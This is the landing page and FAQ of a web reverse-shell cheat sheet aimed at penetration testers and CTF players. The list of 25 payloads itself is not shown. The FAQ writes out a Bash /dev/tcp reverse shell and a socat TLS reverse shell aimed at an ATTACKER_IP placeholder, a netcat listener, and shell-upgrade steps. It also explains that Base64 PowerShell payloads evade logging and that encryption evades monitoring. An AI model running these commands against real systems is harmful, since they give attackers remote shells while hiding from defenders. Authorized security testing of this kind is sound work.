liminfo

Reverse Shell Reference

Free reference guide: Reverse Shell Reference

25 results

About Reverse Shell Reference

The Reverse Shell Cheat Sheet is a searchable collection of 25 copy-ready reverse shell payloads organized by language and tool. It covers Bash (interactive, read-line, UDP, mkfifo, exec), Python (2, 3, PTY, short one-liner), PHP (exec, proc_open, system, webshell), PowerShell (TCP, Base64, Nishang), and Netcat (with/without -e, ncat SSL, listener setup), plus Perl, Ruby, Java, socat, and TTY shell upgrade techniques.

Designed for penetration testers, red teamers, CTF players, and security researchers who need quick access to reliable reverse shell one-liners during engagements. Each payload includes the exact command syntax with ATTACKER_IP and PORT placeholders ready for substitution.

All content is displayed client-side in your browser with no downloads or accounts required. Supports Korean and English, dark mode, and responsive layouts for use on any device.

Key Features

  • 25 reverse shell payloads across 6 categories: Bash, Python, PHP, PowerShell, Netcat, and Other (Perl, Ruby, Java, socat)
  • Multiple Bash variants: interactive (-i), read-line, UDP, mkfifo named pipe, and exec file descriptor techniques
  • Python payloads for versions 2 and 3, including PTY-spawning shells for full TTY support and compact one-liners
  • PHP reverse shells using exec, proc_open, system (mkfifo), and a simple command webshell for web application scenarios
  • PowerShell TCP client, Base64-encoded payload for evasion, and Nishang framework integration
  • Netcat with and without -e flag, Nmap ncat with SSL encryption, and listener setup commands (nc -lvnp)
  • TTY shell upgrade recipes: Python pty.spawn, script /dev/null, stty raw echo, and TERM export
  • Socat encrypted reverse shell with OpenSSL certificate-based TLS for secure communications

Frequently Asked Questions

What reverse shell languages and tools does this cheat sheet cover?

It covers Bash (5 variants including interactive, UDP, mkfifo, exec), Python (versions 2, 3, PTY, short one-liner), PHP (exec, proc_open, system, webshell), PowerShell (TCP, Base64 encoded, Nishang framework), Netcat (with -e, without -e, ncat SSL, listener), and additional tools including Perl, Ruby, Java Runtime, socat with OpenSSL, and TTY shell upgrade techniques -- 25 payloads total.

How do I use a reverse shell payload from this reference?

First, set up a listener on your attacking machine (e.g., nc -lvnp PORT). Then, copy the desired payload, replace ATTACKER_IP with your listener IP address and PORT with your chosen port number, and execute it on the target system. The target will connect back to your listener, giving you an interactive shell.

What is the difference between a reverse shell and a bind shell?

A reverse shell has the target connect back to the attacker's listener, making it effective when the target is behind a firewall that blocks inbound connections. A bind shell opens a listening port on the target that the attacker connects to. Reverse shells are generally preferred in penetration testing because outbound connections are less commonly blocked.

How do I upgrade a basic reverse shell to a fully interactive TTY?

The cheat sheet includes TTY upgrade techniques: Run python3 -c "import pty; pty.spawn('/bin/bash')" or "script /dev/null -c bash" to get a PTY. Then press Ctrl+Z to background, run "stty raw -echo; fg" on your local terminal, and "export TERM=xterm" in the shell. This gives you command history, tab completion, and proper terminal handling.

Which reverse shell should I try first on a Linux target?

Start with the Bash interactive shell (bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1) as it requires no additional tools. If /dev/tcp is not available, try the mkfifo variant with netcat. If Python is installed, the Python 3 PTY shell provides the best interactive experience. Fall back to Perl or Ruby if other interpreters are not available.

How does the socat encrypted reverse shell work?

Socat uses OpenSSL to create a TLS-encrypted tunnel between attacker and target. The attacker runs a listener with a PEM certificate (socat file:`tty`,raw,echo=0 OPENSSL-LISTEN:PORT,cert=cert.pem,verify=0), and the target connects with socat OPENSSL:ATTACKER_IP:PORT,verify=0 EXEC:/bin/bash,pty,stderr,setsid. This encrypts all traffic, making it harder to detect via network monitoring.

What is the PowerShell Base64 payload used for?

The Base64-encoded PowerShell payload helps bypass command-line logging and basic string detection. The actual reverse shell command is encoded in Unicode Base64, then executed with powershell -enc. This is commonly used in Windows environments where security tools monitor command-line arguments for known malicious strings.

Is this tool intended for authorized security testing only?

Yes. These payloads are provided as a reference for authorized penetration testing, red team engagements, CTF competitions, and security research. Unauthorized access to computer systems is illegal. Always ensure you have explicit written permission before testing any system. This reference helps security professionals work efficiently during legitimate assessments.